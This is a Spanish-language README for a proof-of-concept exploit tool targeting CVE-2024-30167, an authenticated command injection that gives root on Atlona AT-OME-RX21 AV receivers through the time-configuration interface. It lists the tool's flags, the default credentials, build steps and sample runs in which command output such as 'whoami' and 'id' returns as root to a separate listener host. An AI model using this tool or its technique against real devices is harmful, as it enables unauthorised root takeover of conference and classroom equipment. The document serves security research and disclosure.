
Prueba de concepto de explotación para inyección de comandos autenticada en Atlona AT-OME-RX21, que permite la ejecución de comandos a nivel de root a través de la interfaz de configuración de hora.
Descargo de responsabilidad: Esta prueba de concepto se proporciona únicamente con fines educativos y de investigación. No utilice este código en sistemas que no posea o para los que no tenga permiso explícito de prueba. No soy responsable de ningún uso indebido.
Existe una vulnerabilidad de inyección de comandos autenticada en la interfaz de configuración de hora del conmutador AV Atlona AT-OME-RX21. Un usuario con credenciales válidas puede inyectar comandos del sistema operativo que se ejecutan como root, lo que lleva a un compromiso total del sistema.
Atlona AT-OME-RX21 es un receptor y escalador AV (audio/video) diseñado para entornos profesionales de videoconferencia y colaboración. Se utiliza principalmente en salas de conferencias, aulas y espacios de reunión. Ayuda a conectar dispositivos como portátiles/sistemas de conferencia a pantallas.
Este PoC funciona contra todas las versiones de firmware <= 1.5.1
info del proveedor: https://atlona.com/product/at-ome-rx21/
$ .\cve-2024-30167.exe -h
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Usage of cve-2024-30167.exe:
-P string
listening port for command output (default "4444")
-c string
Command to execute on the target
-l string
listening host for command output
-p string
Password for authentication (default "Atlona")
-t string
Target URL (e.g: http://example.com)
-u string
Username for authentication (default "admin")
go build -o <OUTPUT_FILENAME>
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
root
$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)
el comando anterior utiliza las credenciales predeterminadas para iniciar sesión en el dispositivo.
SINTAXIS:
.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>